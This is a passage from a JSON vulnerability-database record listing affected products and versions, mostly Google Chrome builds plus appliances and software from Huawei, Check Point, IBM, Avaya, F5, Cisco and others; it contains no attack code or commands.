0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.548.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.640.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.23" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.18" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.110" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.514" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.759.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.1" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.84" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.59" }, { "model": "oceanstor s5800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "n series oncommand 6.1r1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.42" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "e6000 blade server bh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.56" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.69" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.30" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.149" }, { "model": "gaia r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.833.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.47" }, { "model": "gaia r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.119" }, { "model": "vcenter hyperic server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.2" }, { "model": "vcenter operations manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.810.0" }, { "model": "ipso r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "gaia ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.23" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.31" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.41" }, { "model": "system storage san40b-4 2498-b40", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.649.0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.78" }, { "model": "oceanstor s5600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.1" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.316.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.9" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.90" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.692.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.7" }, { "model": "universal small cell cloudbase", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11" }, { "model": "cloudsystem foundation", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.639.0" }, { "model": "wireless lan wos with aos", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "91007.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.98" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.630.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.0" }, { "model": "telepresence recording server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.885.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.52" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "ipso r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.569.0" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.962.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.318.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.619.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.14" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.63" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "t620 flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.6" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7835" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1004" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.86" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1033" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.100" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3050" }, { "model": "secureplatform r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1044" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1679.0" }, { "model": "secureplatform r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7225" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.56" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11.3" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.539.0" }, { "model": "e6000 blade server bh622 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.661.0" }, { "model": "insight control for linux central management", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.91" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.474.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.1" }, { "model": "audit vault and database firewall", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "vertica", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1-0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.42" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.1" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.883.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.306" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.62" }, { "model": "galax8800 v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.348.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.515" }, { "model": "life cycle management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.62" }, { "model": "t410 smart zero client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.7" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.705.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.122" }, { "model": "application dependency planner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.395.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1016.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.84" }, { "model": "system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x0" }, { "model": "system storage san768b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-816" }, { "model": "oceanstor s6800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1075.0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.33" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.20" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.117" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.443.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.107" }, { "model": "gaia r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.34" }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.18" }, { "model": "videoscape distribution suite transparent caching", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96379" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.217" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.40" }, { "model": "9710-e08", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1074.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.900.0" }, { "model": "chrome", "scope": "eq", "trust": 